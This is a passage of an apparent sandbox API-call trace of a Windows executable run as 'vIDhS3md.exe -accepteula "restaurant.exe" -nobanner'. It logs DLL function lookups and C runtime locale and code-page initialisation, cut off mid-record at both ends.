0x75156920 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0298.372] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0298.373] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="SetUnhandledExceptionFilter") returned 0x7514a2c0 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x75156020 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751477b0 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="TerminateProcess") returned 0x7514fbc0 [0298.374] GetProcAddress (hModule=0x75130000, lpProcName="TlsAlloc") returned 0x75149a70 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="TlsGetValue") returned 0x75141ba0 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="TlsSetValue") returned 0x75141da0 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="TlsFree") returned 0x75149930 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="IsValidCodePage") returned 0x7514a090 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetACP") returned 0x75148770 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetOEMCP") returned 0x7514fd10 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetCPInfo") returned 0x75149fc0 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetProcessHeap") returned 0x75147910 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="RtlUnwind") returned 0x75149a80 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="QueryPerformanceCounter") returned 0x75142dc0 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x75141d90 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x75142b90 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="GetEnvironmentStringsW") returned 0x7514a3b0 [0298.375] GetProcAddress (hModule=0x75130000, lpProcName="FreeEnvironmentStringsW") returned 0x7514a0f0 [0298.376] GetProcAddress (hModule=0x75130000, lpProcName="HeapReAlloc") returned 0x779cbae0 [0298.376] GetProcAddress (hModule=0x75130000, lpProcName="SetEndOfFile") returned 0x751564f0 [0298.376] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74c60000 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="GetTokenInformation") returned 0x74c7ed40 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegDeleteKeyW") returned 0x74c7fca0 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="LookupPrivilegeValueW") returned 0x74c795e0 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="AdjustTokenPrivileges") returned 0x74c80680 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="OpenProcessToken") returned 0x74c7ee90 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegSetValueExW") returned 0x74c7f0a0 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegQueryValueExW") returned 0x74c7ed60 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyExW") returned 0x74c7ed80 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegOpenKeyW") returned 0x74c7f590 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegCreateKeyW") returned 0x74c806c0 [0298.376] GetProcAddress (hModule=0x74c60000, lpProcName="RegCloseKey") returned 0x74c7efa0 [0298.377] GetProcAddress (hModule=0x74c60000, lpProcName="LookupAccountSidW") returned 0x74c7f7b0 [0298.377] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x74eb0000 [0298.377] GetProcAddress (hModule=0x74eb0000, lpProcName="PrintDlgW") returned 0x74ebc6a0 [0298.377] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77370000 [0298.377] GetProcAddress (hModule=0x77370000, lpProcName="StartPage") returned 0x7741ee10 [0298.377] GetProcAddress (hModule=0x77370000, lpProcName="EndDoc") returned 0x773f55a0 [0298.377] GetProcAddress (hModule=0x77370000, lpProcName="StartDocW") returned 0x773f57e0 [0298.377] GetProcAddress (hModule=0x77370000, lpProcName="SetMapMode") returned 0x773f9590 [0298.377] GetProcAddress (hModule=0x77370000, lpProcName="GetDeviceCaps") returned 0x773f0820 [0298.377] GetProcAddress (hModule=0x77370000, lpProcName="EndPage") returned 0x7741fbc0 [0298.377] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ad0000 [0298.377] GetProcAddress (hModule=0x74ad0000, lpProcName="SendMessageW") returned 0x74ae38f0 [0298.377] GetProcAddress (hModule=0x74ad0000, lpProcName="DialogBoxIndirectParamW") returned 0x74afb6b0 [0298.377] GetProcAddress (hModule=0x74ad0000, lpProcName="EndDialog") returned 0x74afb430 [0298.377] GetProcAddress (hModule=0x74ad0000, lpProcName="LoadCursorW") returned 0x74ae7740 [0298.378] GetProcAddress (hModule=0x74ad0000, lpProcName="InflateRect") returned 0x74af74e0 [0298.378] GetProcAddress (hModule=0x74ad0000, lpProcName="GetSysColorBrush") returned 0x74afefa0 [0298.378] GetProcAddress (hModule=0x74ad0000, lpProcName="SetCursor") returned 0x74b04ed0 [0298.378] GetProcAddress (hModule=0x74ad0000, lpProcName="SetWindowTextW") returned 0x74af4580 [0298.378] GetProcAddress (hModule=0x74ad0000, lpProcName="GetDlgItem") returned 0x74af1540 [0298.378] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x74730000 [0298.378] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoW") returned 0x74731580 [0298.378] GetProcAddress (hModule=0x74730000, lpProcName="VerQueryValueW") returned 0x74731500 [0298.378] GetProcAddress (hModule=0x74730000, lpProcName="GetFileVersionInfoSizeW") returned 0x74731560 [0298.378] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x2) returned 1 [0298.379] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x19ff60 | out: lpflOldProtect=0x19ff60*=0x4) returned 1 [0298.379] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19ff70 | out: lpSystemTimeAsFileTime=0x19ff70*(dwLowDateTime=0x5f55994f, dwHighDateTime=0x1d45ac6)) [0298.379] GetCurrentThreadId () returned 0xcb0 [0298.379] GetCurrentProcessId () returned 0xcac [0298.379] QueryPerformanceCounter (in: lpPerformanceCount=0x19ff68 | out: lpPerformanceCount=0x19ff68*=34584131800) returned 1 [0298.379] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0298.379] GetProcAddress (hModule=0x75130000, lpProcName="FlsAlloc") returned 0x7514a330 [0298.379] GetProcAddress (hModule=0x75130000, lpProcName="FlsFree") returned 0x7514f400 [0298.379] GetProcAddress (hModule=0x75130000, lpProcName="FlsGetValue") returned 0x75147580 [0298.379] GetProcAddress (hModule=0x75130000, lpProcName="FlsSetValue") returned 0x75149910 [0298.379] GetProcAddress (hModule=0x75130000, lpProcName="InitializeCriticalSectionEx") returned 0x75156030 [0298.379] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventExW") returned 0x75155f90 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="CreateSemaphoreExW") returned 0x75155ff0 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadStackGuarantee") returned 0x7514a5d0 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolTimer") returned 0x7514a690 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolTimer") returned 0x779c40f0 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x779bd630 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolTimer") returned 0x779becf0 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="CreateThreadpoolWait") returned 0x75155720 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadpoolWait") returned 0x779be140 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="CloseThreadpoolWait") returned 0x779beb60 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="FlushProcessWriteBuffers") returned 0x779f9990 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x779f5540 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessorNumber") returned 0x779e9dc0 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="GetLogicalProcessorInformation") returned 0x7514a550 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="CreateSymbolicLinkW") returned 0x75170a40 [0298.380] GetProcAddress (hModule=0x75130000, lpProcName="SetDefaultDllDirectories") returned 0x74e60790 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="EnumSystemLocalesEx") returned 0x7514f8a0 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="CompareStringEx") returned 0x7514fa30 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetDateFormatEx") returned 0x75171030 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x7514a000 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetTimeFormatEx") returned 0x751714b0 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetUserDefaultLocaleName") returned 0x7514a4f0 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="IsValidLocaleName") returned 0x751716f0 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringEx") returned 0x75149970 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentPackageId") returned 0x74de3c90 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetTickCount64") returned 0x75148710 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0298.381] GetProcAddress (hModule=0x75130000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0298.382] GetCurrentThreadId () returned 0xcb0 [0298.382] GetStartupInfoW (in: lpStartupInfo=0x19fed0 | out: lpStartupInfo=0x19fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x53de3b09, hStdError=0x475810)) [0298.382] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0298.382] GetFileType (hFile=0x38) returned 0x2 [0298.382] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc0 [0298.382] GetFileType (hFile=0xc0) returned 0x3 [0298.382] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0298.382] GetFileType (hFile=0x40) returned 0x2 [0298.382] GetCommandLineW () returned="vIDhS3md.exe -accepteula \"restaurant.exe\" -nobanner" [0298.382] GetEnvironmentStringsW () returned 0x5e22b0* [0298.382] FreeEnvironmentStringsW (penv=0x5e22b0) returned 1 [0298.382] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0298.383] GetLastError () returned 0x0 [0298.383] SetLastError (dwErrCode=0x0) [0298.383] GetLastError () returned 0x0 [0298.383] SetLastError (dwErrCode=0x0) [0298.383] GetLastError () returned 0x0 [0298.383] SetLastError (dwErrCode=0x0) [0298.383] GetACP () returned 0x4e4 [0298.383] GetLastError () returned 0x0 [0298.383] SetLastError (dwErrCode=0x0) [0298.383] IsValidCodePage (CodePage=0x4e4) returned 1 [0298.384] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fec4 | out: lpCPInfo=0x19fec4) returned 1 [0298.384] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f98c | out: lpCPInfo=0x19f98c) returned 1 [0298.384] GetLastError () returned 0x0 [0298.384] SetLastError (dwErrCode=0x0) [0298.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0298.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f708, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0298.384] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpCharType=0x19f9a0 | out: lpCharType=0x19f9a0) returned 1 [0298.384] GetLastError () returned 0x0 [0298.384] SetLastError (dwErrCode=0x0) [0298.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0298.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0298.384] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0298.384] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchSrc=256, lpDestStr=0x19f4c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0298.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x19fca0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x99\x3a\xde\x53\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0298.384] GetLastError () returned 0x0 [0298.384] SetLastError (dwErrCode=0x0) [0298.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0298.384] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fda0, cbMultiByte=256, lpWideCharStr=0x19f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā") returned 256 [0298.384] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0298.384] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ@Ā", cchSrc=256, lpDestStr=0x19f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 